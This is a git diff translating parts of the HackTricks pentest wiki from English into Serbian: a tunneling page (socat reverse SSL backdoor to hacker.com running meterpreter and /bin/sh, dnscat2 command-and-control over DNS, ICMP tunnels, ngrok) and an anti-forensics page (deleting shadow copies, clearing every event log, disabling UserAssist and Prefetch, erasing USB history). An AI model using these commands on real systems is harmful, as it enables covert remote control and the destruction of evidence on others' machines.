@@ -345,21 +286,17 @@ attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,f victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5 #Execute the meterpreter ``` - -You can bypass a **non-authenticated proxy** executing this line instead of the last one in the victim's console: - +Možete zaobići **neautentifikovani proxy** izvršavanjem ove linije umesto poslednje u konzoli žrtve: ```bash OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5 ``` - [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) -### SSL Socat Tunnel +### SSL Socat Tuner -**/bin/sh console** - -Create certificates on both sides: Client and Server +**/bin/sh konzola** +Kreirajte sertifikate na obe strane: Klijent i Server ```bash # Execute these commands on both sides FILENAME=socatssl 
@@ -373,34 +310,28 @@ chmod 600 $FILENAME.key $FILENAME.pem attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt ``` - ### Remote Port2Port -Connect the local SSH port (22) to the 443 port of the attacker host - +Povežite lokalni SSH port (22) sa 443 portom napadačkog hosta ```bash attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost victim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22 attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim ``` - ## Plink.exe -It's like a console PuTTY version ( the options are very similar to an ssh client). - -As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine: +To je kao konzolna verzija PuTTY-a (opcije su vrlo slične ssh klijentu). +Pošto će ova binarna datoteka biti izvršena na žrtvi i to je ssh klijent, potrebno je da otvorimo naš ssh servis i port kako bismo imali obrnutu vezu. Zatim, da bismo prosledili samo lokalno dostupni port na port na našoj mašini: ```bash echo y | plink.exe -l -pw [-p ] -R :: echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 ``` - ## Windows netsh ### Port2Port -You need to be a local admin (for any port) - +Morate biti lokalni administrator (za bilo koji port) ```bash netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp # Example: 
@@ -410,60 +341,50 @@ netsh interface portproxy show v4tov4 # Delete port forward netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444 ``` - ## SocksOverRDP & Proxifier -You need to have **RDP access over the system**.\ -Download: +Morate imati **RDP pristup preko sistema**.\ +Preuzmite: -1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**. +1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - Ovaj alat koristi `Dynamic Virtual Channels` (`DVC`) iz funkcije Remote Desktop Service u Windows-u. DVC je odgovoran za **tunelovanje paketa preko RDP veze**. 2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab) -In your client computer load **`SocksOverRDP-Plugin.dll`** like this: - +Na vašem klijentskom računaru učitajte **`SocksOverRDP-Plugin.dll`** na sledeći način: ```bash # Load SocksOverRDP.dll using regsvr32.exe C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll ``` +Sada možemo **povezati** se sa **žrtvom** preko **RDP** koristeći **`mstsc.exe`**, i trebali bismo primiti **poruku** koja kaže da je **SocksOverRDP plugin omogućen**, i da će **slušati** na **127.0.0.1:1080**. -Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**. 
- -**Connect** via **RDP** and upload & execute in the victim machine the `SocksOverRDP-Server.exe` binary: - +**Povežite** se putem **RDP** i otpremite & izvršite na mašini žrtve `SocksOverRDP-Server.exe` binarni fajl: ``` C:\SocksOverRDP-x64> SocksOverRDP-Server.exe ``` - -Now, confirm in you machine (attacker) that the port 1080 is listening: - +Sada, potvrdite na vašem računaru (napadaču) da port 1080 sluša: ``` netstat -antb | findstr 1080 ``` +Sada možete koristiti [**Proxifier**](https://www.proxifier.com/) **da proksirate saobraćaj kroz tu port.** -Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.** +## Proksiranje Windows GUI aplikacija -## Proxify Windows GUI Apps +Možete naterati Windows GUI aplikacije da prolaze kroz proksi koristeći [**Proxifier**](https://www.proxifier.com/).\ +U **Profile -> Proxy Servers** dodajte IP adresu i port SOCKS servera.\ +U **Profile -> Proxification Rules** dodajte ime programa koji želite da proksirate i veze ka IP adresama koje želite da proksirate. -You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\ -In **Profile -> Proxy Servers** add the IP and port of the SOCKS server.\ -In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify. - -## NTLM proxy bypass - -The previously mentioned tool: **Rpivot**\ -**OpenVPN** can also bypass it, setting these options in the configuration file: +## NTLM proksi zaobilaženje +Prethodno pomenuti alat: **Rpivot**\ +**OpenVPN** takođe može da ga zaobiđe, postavljajući ove opcije u konfiguracionom fajlu: ```bash http-proxy 8080 ntlm ``` - ### Cntlm [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) -It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. 
Then, you can use the tool of your choice through this port.\ -For example that forward port 443 - +Ova alatka se autentifikuje protiv proksija i vezuje lokalni port koji se prosleđuje eksternoj usluzi koju odredite. Zatim možete koristiti alat po vašem izboru preko ovog porta.\ +Na primer, prosledite port 443. ``` Username Alice Password P@ssw0rd @@ -471,13 +392,12 @@ Domain CONTOSO.COM Proxy 10.0.0.10:8080 Tunnel 2222::443 ``` - -Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\ -You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222. +Sada, ako na primer postavite **SSH** servis na žrtvi da sluša na portu 443. Možete se povezati na njega preko napadačkog porta 2222.\ +Takođe možete koristiti **meterpreter** koji se povezuje na localhost:443, a napadač sluša na portu 2222. ## YARP -A reverse proxy created by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) +Obrnuti proxy koji je kreirao Microsoft. Možete ga pronaći ovde: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) ## DNS Tunneling 
@@ -485,26 +405,21 @@ A reverse proxy created by Microsoft. You can find it here: [https://github.com/ [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/) -Root is needed in both systems to create tun adapters and tunnel data between them using DNS queries. - +Root je potreban na oba sistema da bi se kreirali tun adapteri i tunelovali podaci između njih koristeći DNS upite. ``` attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com victim> iodine -f -P P@ssw0rd tunneldomain.com -r #You can see the victim at 1.1.1.2 ``` - -The tunnel will be very slow. You can create a compressed SSH connection through this tunnel by using: - +Tunel će biti veoma spor. Možete kreirati kompresovanu SSH vezu kroz ovaj tunel koristeći: ``` ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ``` - ### DNSCat2 -[**Download it from here**](https://github.com/iagox86/dnscat2)**.** - -Establishes a C\&C channel through DNS. It doesn't need root privileges. +[**Preuzmite ga ovde**](https://github.com/iagox86/dnscat2)**.** +Uspostavlja C\&C kanal putem DNS-a. Ne zahteva root privilegije. ```bash attacker> ruby ./dnscat2.rb tunneldomain.com victim> ./dnscat2 tunneldomain.com 
@@ -513,28 +428,23 @@ victim> ./dnscat2 tunneldomain.com attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache victim> ./dnscat2 --dns host=10.10.10.10,port=5353 ``` +#### **U PowerShell-u** -#### **In PowerShell** - -You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell: - +Možete koristiti [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) da pokrenete dnscat2 klijent u powershell-u: ``` Import-Module .\dnscat2.ps1 Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd ``` - -#### **Port forwarding with dnscat** - +#### **Prosleđivanje portova sa dnscat** ```bash session -i listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host ``` +#### Promena proxychains DNS -#### Change proxychains DNS +Proxychains presreće `gethostbyname` libc poziv i tuneluje tcp DNS zahtev kroz socks proxy. Po **defaultu** DNS server koji proxychains koristi je **4.2.2.2** (hardkodiran). Da biste ga promenili, uredite datoteku: _/usr/lib/proxychains3/proxyresolv_ i promenite IP. Ako ste u **Windows okruženju**, možete postaviti IP **domen kontrolera**. -Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. - -## Tunnels in Go +## Tunneli u Go [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel) 
@@ -545,18 +455,15 @@ Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request thr [https://github.com/friedrich/hans](https://github.com/friedrich/hans)\ [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel) -Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests. - +Root je potreban u oba sistema da bi se kreirali tun adapteri i tunelovali podaci između njih koristeći ICMP echo zahteve. ```bash ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection) ./hans -f -c -p P@ssw0rd -v ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` - ### ptunnel-ng -[**Download it from here**](https://github.com/utoni/ptunnel-ng.git). - +[**Preuzmite ga ovde**](https://github.com/utoni/ptunnel-ng.git). ```bash # Generate it sudo ./autogen.sh 
@@ -570,32 +477,28 @@ ssh -p 2222 -l user 127.0.0.1 # Create a socks proxy through the SSH connection through the ICMP tunnel ssh -D 9050 -p 2222 -l user 127.0.0.1 ``` - ## ngrok -[**ngrok**](https://ngrok.com/) **is a tool to expose solutions to Internet in one command line.**\ -&#xNAN;_Exposition URI are like:_ **UID.ngrok.io** +[**ngrok**](https://ngrok.com/) **je alat za izlaganje rešenja internetu u jednoj komandnoj liniji.**\ +&#xNAN;_Exposition URI su kao:_ **UID.ngrok.io** -### Installation - -- Create an account: https://ngrok.com/signup -- Client download: +### Instalacija +- Napravite nalog: https://ngrok.com/signup +- Preuzimanje klijenta: ```bash tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin chmod a+x ./ngrok # Init configuration, with your token ./ngrok config edit ``` +### Osnovne upotrebe -### Basic usages +**Dokumentacija:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/). -**Documentation:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/). - -_It is also possible to add authentication and TLS, if necessary._ +_ Takođe je moguće dodati autentifikaciju i TLS, ako je potrebno._ #### Tunneling TCP - ```bash # Pointing to 0.0.0.0:4444 ./ngrok tcp 4444 
@@ -603,49 +506,42 @@ _It is also possible to add authentication and TLS, if necessary._ # Listen (example): nc -nvlp 4444 # Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345 ``` - -#### Exposing files with HTTP - +#### Izlaganje fajlova putem HTTP-a ```bash ./ngrok http file:///tmp/httpbin/ # Example of resulting link: https://abcd-1-2-3-4.ngrok.io/ ``` - #### Sniffing HTTP calls -_Useful for XSS,SSRF,SSTI ..._\ -Directly from stdout or in the HTTP interface [http://127.0.0.1:4040](http://127.0.0.1:4000). +_Korisno za XSS, SSRF, SSTI ..._\ +Direktno iz stdout-a ili u HTTP interfejsu [http://127.0.0.1:4040](http://127.0.0.1:4000). #### Tunneling internal HTTP service - ```bash ./ngrok http localhost:8080 --host-header=rewrite # Example of resulting link: https://abcd-1-2-3-4.ngrok.io/ # With basic auth ./ngrok http localhost:8080 --host-header=rewrite --auth="myuser:mysuperpassword" ``` +#### ngrok.yaml jednostavan primer konfiguracije -#### ngrok.yaml simple configuration example - -It opens 3 tunnels: +Otvara 3 tunela: - 2 TCP -- 1 HTTP with static files exposition from /tmp/httpbin/ - +- 1 HTTP sa izlaganjem statičkih fajlova iz /tmp/httpbin/ ```yaml tunnels: - mytcp: - addr: 4444 - proto: tcptunne - anothertcp: - addr: 5555 - proto: tcp - httpstatic: - proto: http - addr: file:///tmp/httpbin/ +mytcp: +addr: 4444 +proto: tcptunne +anothertcp: +addr: 5555 +proto: tcp +httpstatic: +proto: http +addr: file:///tmp/httpbin/ ``` - -## Other tools to check +## Ostali alati za proveru - [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) - [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index e725dfa85..9fc9de28f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md 
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -1,30 +1,30 @@ -# Basic Forensic Methodology +# Osnovna Forenzička Metodologija {{#include ../../banners/hacktricks-training.md}} -## Creating and Mounting an Image +## Kreiranje i Montiranje Slike {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md {{#endref}} -## Malware Analysis +## Analiza Malvera -This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: +Ovo **nije nužno prvi korak koji treba preduzeti kada imate sliku**. Ali možete koristiti ove tehnike analize malvera nezavisno ako imate datoteku, sliku datotečnog sistema, sliku memorije, pcap... tako da je dobro **imati ove akcije na umu**: {{#ref}} malware-analysis.md {{#endref}} -## Inspecting an Image +## Istraživanje Slike -if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: +Ako dobijete **forenzičku sliku** uređaja, možete početi **analizirati particije, datotečni sistem** koji se koristi i **oporaviti** potencijalno **zanimljive datoteke** (čak i obrisane). Saznajte kako u: {{#ref}} partitions-file-systems-carving/ {{#endref}} -Depending on the used OSs and even platform different interesting artifacts should be searched: +U zavisnosti od korišćenih OS-ova i čak platformi, različiti zanimljivi artefakti treba da se pretražuju: {{#ref}} windows-forensics/ 
@@ -38,42 +38,42 @@ linux-forensics.md docker-forensics.md {{#endref}} -## Deep inspection of specific file-types and Software +## Dubinska Inspekcija Specifičnih Tipova Datoteka i Softvera -If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ -Read the following page to learn some interesting tricks: +Ako imate vrlo **sumnjivu** **datoteku**, onda **u zavisnosti od tipa datoteke i softvera** koji je kreirao, nekoliko **trikova** može biti korisno.\ +Pročitajte sledeću stranicu da biste saznali neke zanimljive trikove: {{#ref}} specific-software-file-type-tricks/ {{#endref}} -I want to do a special mention to the page: +Želim da posebno pomenem stranicu: {{#ref}} specific-software-file-type-tricks/browser-artifacts.md {{#endref}} -## Memory Dump Inspection +## Inspekcija Dump-a Memorije {{#ref}} memory-dump-analysis/ {{#endref}} -## Pcap Inspection +## Inspekcija Pcap-a {{#ref}} pcap-inspection/ {{#endref}} -## **Anti-Forensic Techniques** +## **Anti-Forenzičke Tehnike** -Keep in mind the possible use of anti-forensic techniques: +Imajte na umu moguću upotrebu anti-forenzičkih tehnika: {{#ref}} anti-forensic-techniques.md {{#endref}} -## Threat Hunting +## Lov na Pretnje {{#ref}} file-integrity-monitoring.md diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md index 94a381b98..3af40d29d 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md 
@@ -4,72 +4,72 @@ ## Timestamps -An attacker may be interested in **changing the timestamps of files** to avoid being detected.\ -It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` \_\_ and \_\_ `$FILE_NAME`. +Napadač može biti zainteresovan za **promenu vremenskih oznaka datoteka** kako bi izbegao otkrivanje.\ +Moguće je pronaći vremenske oznake unutar MFT u atributima `$STANDARD_INFORMATION` \_\_ i \_\_ `$FILE_NAME`. -Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB). +Oba atributa imaju 4 vremenske oznake: **Modifikacija**, **pristup**, **kreiranje** i **modifikacija MFT registra** (MACE ili MACB). -**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**. +**Windows explorer** i drugi alati prikazuju informacije iz **`$STANDARD_INFORMATION`**. ### TimeStomp - Anti-forensic Tool -This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. +Ovaj alat **modifikuje** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali** **ne** informacije unutar **`$FILE_NAME`**. Stoga, moguće je **identifikovati** **sumnjivu** **aktivnost**. ### Usnjrnl -The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes. +**USN Journal** (Dnevnik broja ažuriranja) je funkcija NTFS (Windows NT datotečni sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava ispitivanje ovih promena. 
![](<../../images/image (801).png>) -The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. +Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na datoteci. ### $LogFile -**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes. +**Sve promene metapodataka na datotečnom sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u datoteci nazvanoj `**$LogFile**`, koja se nalazi u korenskom direktorijumu NTFS datotečnog sistema. Alati kao što su [LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za analizu ove datoteke i identifikaciju promena. ![](<../../images/image (137).png>) -Again, in the output of the tool it's possible to see that **some changes were performed**. +Ponovo, u izlazu alata moguće je videti da su **neke promene izvršene**. 
-Using the same tool it's possible to identify to **which time the timestamps were modified**: +Korišćenjem istog alata moguće je identifikovati **kada su vremenske oznake modifikovane**: ![](<../../images/image (1089).png>) -- CTIME: File's creation time -- ATIME: File's modification time -- MTIME: File's MFT registry modification -- RTIME: File's access time +- CTIME: Vreme kreiranja datoteke +- ATIME: Vreme modifikacije datoteke +- MTIME: Modifikacija MFT registra datoteke +- RTIME: Vreme pristupa datoteci -### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison +### `$STANDARD_INFORMATION` i `$FILE_NAME` poređenje -Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**. +Još jedan način da se identifikuju sumnjivo modifikovane datoteke bio bi da se uporede vremena na oba atributa tražeći **neusklađenosti**. -### Nanoseconds +### Nanosekunde -**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. +**NTFS** vremenske oznake imaju **preciznost** od **100 nanosekundi**. Stoga, pronalaženje datoteka sa vremenskim oznakama poput 2010-10-10 10:10:**00.000:0000 je veoma sumnjivo**. ### SetMace - Anti-forensic Tool -This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information. +Ovaj alat može modifikovati oba atributa `$STARNDAR_INFORMATION` i `$FILE_NAME`. Međutim, od Windows Vista, potrebno je da živi OS modifikuje ove informacije. ## Data Hiding -NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**. +NFTS koristi klaster i minimalnu veličinu informacija. 
To znači da ako datoteka koristi i klaster i pola, **preostalo polovina nikada neće biti korišćena** dok se datoteka ne obriše. Tada je moguće **sakriti podatke u ovom slobodnom prostoru**. -There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added: +Postoje alati poput slacker koji omogućavaju skrivanje podataka u ovom "skrivenom" prostoru. Međutim, analiza `$logfile` i `$usnjrnl` može pokazati da su neki podaci dodati: ![](<../../images/image (1060).png>) -Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted. +Tada je moguće povratiti slobodan prostor koristeći alate poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj obfuskovan ili čak enkriptovan. ## UsbKill -This is a tool that will **turn off the computer if any change in the USB** ports is detected.\ -A way to discover this would be to inspect the running processes and **review each python script running**. +Ovo je alat koji će **isključiti računar ako se otkrije bilo kakva promena na USB** portovima.\ +Jedan od načina da se to otkrije bio bi da se ispita pokrenuti procesi i **pregleda svaki python skript koji se izvršava**. ## Live Linux Distributions -These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. +Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da ih otkrijete je **ako je NTFS datotečni sistem montiran sa pravima za pisanje**. Ako je montiran samo sa pravima za čitanje, neće biti moguće otkriti upad. ## Secure Deletion 
@@ -77,74 +77,74 @@ These distros are **executed inside the RAM** memory. The only way to detect the ## Windows Configuration -It's possible to disable several windows logging methods to make the forensics investigation much harder. +Moguće je onemogućiti nekoliko metoda beleženja u Windows-u kako bi se forenzička istraga učinila mnogo težom. ### Disable Timestamps - UserAssist -This is a registry key that maintains dates and hours when each executable was run by the user. +Ovo je ključ registra koji održava datume i sate kada je svaki izvršni program pokrenut od strane korisnika. -Disabling UserAssist requires two steps: +Onemogućavanje UserAssist zahteva dva koraka: -1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. -2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. +1. Postavite dva ključa registra, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` i `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, oba na nulu kako bi se signalizovalo da želimo da onemogućimo UserAssist. +2. Očistite svoje podključeve registra koji izgledaju kao `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. ### Disable Timestamps - Prefetch -This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices. +Ovo će sačuvati informacije o aplikacijama koje su izvršene sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse. 
-- Execute `regedit` -- Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` -- Right-click on both `EnablePrefetcher` and `EnableSuperfetch` -- Select Modify on each of these to change the value from 1 (or 3) to 0 -- Restart +- Izvršite `regedit` +- Izaberite putanju datoteke `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +- Desni klik na `EnablePrefetcher` i `EnableSuperfetch` +- Izaberite Izmeni na svakom od ovih da promenite vrednost sa 1 (ili 3) na 0 +- Ponovo pokrenite ### Disable Timestamps - Last Access Time -Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. +Kad god se folder otvori sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, koje se naziva vreme poslednjeg pristupa. Na NTFS volumenu koji se često koristi, ovo može uticati na performanse. -1. Open the Registry Editor (Regedit.exe). -2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. -3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process. -4. Close the Registry Editor, and reboot the server. +1. Otvorite Registry Editor (Regedit.exe). +2. Pretražite do `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. +3. Potražite `NtfsDisableLastAccessUpdate`. Ako ne postoji, dodajte ovaj DWORD i postavite njegovu vrednost na 1, što će onemogućiti proces. +4. Zatvorite Registry Editor i ponovo pokrenite server. 
### Delete USB History -All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ -You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them (and to delete them). +Sve **USB Device Entries** se čuvaju u Windows Registry pod **USBSTOR** ključem registra koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj u svoj PC ili laptop. Možete pronaći ovaj ključ ovde H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovog** obrišete USB istoriju.\ +Takođe možete koristiti alat [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete). -Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. +Još jedna datoteka koja čuva informacije o USB-ima je datoteka `setupapi.dev.log` unutar `C:\Windows\INF`. Ova datoteka takođe treba da bude obrisana. 
### Disable Shadow Copies -**List** shadow copies with `vssadmin list shadowstorage`\ -**Delete** them running `vssadmin delete shadow` +**List** shadow copies sa `vssadmin list shadowstorage`\ +**Delete** ih pokretanjem `vssadmin delete shadow` -You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) +Takođe ih možete obrisati putem GUI prateći korake predložene u [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): +Da biste onemogućili shadow copies [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. -2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. -3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. +1. Otvorite program Services tako što ćete otkucati "services" u tekstualnom pretraživaču nakon što kliknete na Windows dugme za pokretanje. +2. Sa liste, pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Svojstvima desnim klikom. +3. Izaberite Onemogućeno iz padajućeg menija "Startup type", a zatim potvrdite promenu klikom na Primeni i U redu. 
-It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +Takođe je moguće modifikovati konfiguraciju koje datoteke će biti kopirane u shadow copy u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` ### Overwrite deleted files -- You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. -- You can also use tools like [**Eraser**](https://eraser.heidi.ie) +- Možete koristiti **Windows alat**: `cipher /w:C` Ovo će označiti cipher da ukloni sve podatke iz dostupnog neiskorišćenog prostora na disku unutar C drajva. +- Takođe možete koristiti alate poput [**Eraser**](https://eraser.heidi.ie) ### Delete Windows event logs -- Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" +- Windows + R --> eventvwr.msc --> Proširite "Windows Logs" --> Desni klik na svaku kategoriju i izaberite "Clear Log" - `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl 